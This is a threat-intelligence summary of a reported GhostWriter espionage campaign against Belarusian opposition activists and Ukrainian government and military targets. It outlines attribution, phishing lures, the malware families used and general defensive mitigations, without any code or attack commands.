Full Report
A suspected Belarusian state-backed hacking group is behind a cyber espionage campaign targeting opposition activists in the country, as well as Ukrainian military and government entities, according to a new report.
Analysis Summary
# Threat Actor: GhostWriter
## Attribution & Identity
* **Identification:** Suspected Belarusian state-backed hacking group.
* **Aliasing/Association:** Linked to the long-running GhostWriter hacking group, which is closely tied to Belarusian state intelligence.
## Activity Summary
* **Recent Campaign (Since mid-2024):** A cyber espionage campaign targeting Belarusian opposition activists, as well as Ukrainian military and government entities.
* **Belarusian Opposition Targeting:** This is the first documented case of the group directly targeting Belarus’s opposition, potentially linked to the January presidential election. Decoy documents used against this group contained names of political prisoners.
* **Ukrainian Targeting:** Distribution of phishing documents disguised as an anti-corruption initiative action plan for Ukrainian government organizations and a report template related to military supply logistics.
* **Historical Activities:** Previously targeted government, military, and civilian entities in Ukraine and Europe. In 2023, they were known to deploy PicassoLoader against Ukraine’s government organizations, including an attack on Ukraine’s National Defense University. In June of the previous year (2023), the group attacked Ukraine’s Ministry of Defense and a military base.
## Tactics, Techniques & Procedures
* **Initial Access:** Used phishing documents (decoys referencing political prisoners for opposition, corruption/logistics plans for Ukrainian entities).
* **Execution/Delivery:** Infection with a modified version of PicassoLoader malware, which features significant code alterations in the latest variant, potentially making it more cost-effective and replaceable.
* **Post-Compromise (Implied):** Deployment of a set of known tools for subsequent operations.
* **TTPs Mentioned:** PicassoLoader, AgentTesla, Cobalt Strike Beacon, njRAT.
* **MITRE ATT&CK IDs:** Not specified in the text.
## Targeting
* **Sectors:** Government, Military, Civilian organizations, Political opposition groups/activists.
* **Geography:** Belarus, Ukraine.
* **Victims:** Belarusian opposition activists, Ukrainian military and government entities, Ukraine’s National Defense University, Ukraine’s Ministry of Defense, a military base in Ukraine.
## Tools & Infrastructure
* **Malware Families Used:** PicassoLoader (latest variant modified), AgentTesla, Cobalt Strike Beacon, njRAT.
* **Infrastructure:** Not specifically detailed (no defanged URLs/IPs provided in the source text).
## Implications
* The actor is waging aggressive cyber espionage in line with Belarusian government interests, focusing on both external adversaries (Ukraine) and internal dissent (Belarusian opposition).
* The continued use of established malware families like PicassoLoader, even with modifications, indicates a persistent and resourceful state-aligned cyber espionage unit. The cyber operations continue despite Belarus not actively participating militarily in the war in Ukraine.
## Mitigations
* Implement robust phishing awareness training, especially concerning documents disguised as internal planning or sensitive political materials.
* Ensure endpoint detection and response (EDR) solutions can detect variants of commonly used loaders like PicassoLoader.
* Monitor for the use of known C2 frameworks and malware families associated with GhostWriter (Cobalt Strike, njRAT, AgentTesla).